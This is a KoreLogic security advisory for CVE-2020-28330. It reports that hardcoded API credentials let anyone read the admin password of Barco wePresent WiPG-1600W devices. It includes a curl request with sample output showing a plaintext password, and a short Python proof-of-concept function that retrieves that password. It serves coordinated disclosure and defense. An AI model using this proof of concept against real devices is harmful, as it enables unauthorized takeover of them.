Barco wePresent Admin Credentials Exposed In Plain-text

ID KL-001-2020-005
Type korelogic
Reporter Jim Becher (@jimbecher) of
Modified 2020-11-20T00:00:00


Title: Barco wePresent Admin Credentials Exposed In Plain-text Advisory ID: KL-001-2020-005 Publication Date: 2020.11.20 Publication URL:

  1. Vulnerability Details

    Affected Vendor: Barco Affected Product: wePresent WiPG-1600W Affected Version: Platform: Embedded Linux CWE Classification: CWE-523: Unprotected Transport of Credentials CVE ID: CVE-2020-28330

  2. Vulnerability Description

    An attacker armed with hardcoded API credentials from KL-001-2020-004 (CVE-2020-28329) can issue an authenticated query to display the admin password for the main web user interface listening on port 443/tcp.

  3. Technical Description

    An authenticated request using the hardcoded credentials in KL-001-2020-004 (CVE-2020-28329) to https://<IP>:4001/w1.0 will display the current admin password in clear text. An attacker will now have the admin password on the device, and can use the web interface to make any configuration changes to the device using the web UI.

    $ curl -k -u 'admin:[REDACTED]' { "status": 200, "message": "Get successful", "data": { "key": "/w1.0", "value": { "ClientAccess":{ "EnableAirplay": true }, "Configuration":{ "RestartSystem": false, "ShutdownSystem": false, "SetAction": "NoAction", "SetActionUrl": "" }, "DeviceInfo":{ "ArticleNumber": "Barco_Number", "CurrentUptime": 58524, "InUse": false, "ModelName": "WiPG-1600", "Sharing": false, "Status": 0, "StatusMessage": "", "TotalUptime": 473871262, "TotalUsers": 0, "LoginCodeOption": "Random", "LoginCode": "3746", "SystemPassword": "W3Pr3s3nt", <- Admin password ... ...

  4. Mitigation and Remediation Recommendation

    The vendor has released an updated firmware ( which remediates the described vulnerability. Firmware and release notes are available at:

  5. Credit

    This vulnerability was discovered by Jim Becher (@jimbecher) of KoreLogic, Inc.

  6. Disclosure Timeline

    2020.08.24 - KoreLogic submits vulnerability details to Barco. 2020.08.25 - Barco acknowledges receipt and the intention to investigate. 2020.09.21 - Barco notifies KoreLogic that this issue, along with several others reported by KoreLogic, will require more than the standard 45 business day remediation timeline. Barco requests to delay coordinated disclosure until 2020.12.11. 2020.09.23 - KoreLogic agrees to 2020.12.11 coordinated disclosure. 2020.09.25 - Barco informs KoreLogic of their intent to acquire CVE number for this vulnerability. 2020.11.09 - Barco shares CVE number with KoreLogic and announces their intention to release the updated firmware ahead of schedule, on 2020.11.11. Request that KoreLogic delay public disclosure until 2020.11.20. 2020.11.11 - Barco firmware release. 2020.11.20 - KoreLogic public disclosure.

  7. Proof of Concept

    The following is a basic Python function to return the admin password:

    def get_admin_pw(host, port, adminpw): apiuser = "admin" apipw = "[REDACTED]" url = "https://" + host + ":" + port + "/w1.0" response = requests.get(url, auth=HTTPBasicAuth(apiuser, apipw), verify=False, timeout=3) dict = response.json() adminpw = dict['data']['value']['DeviceInfo']['SystemPassword'] return adminpw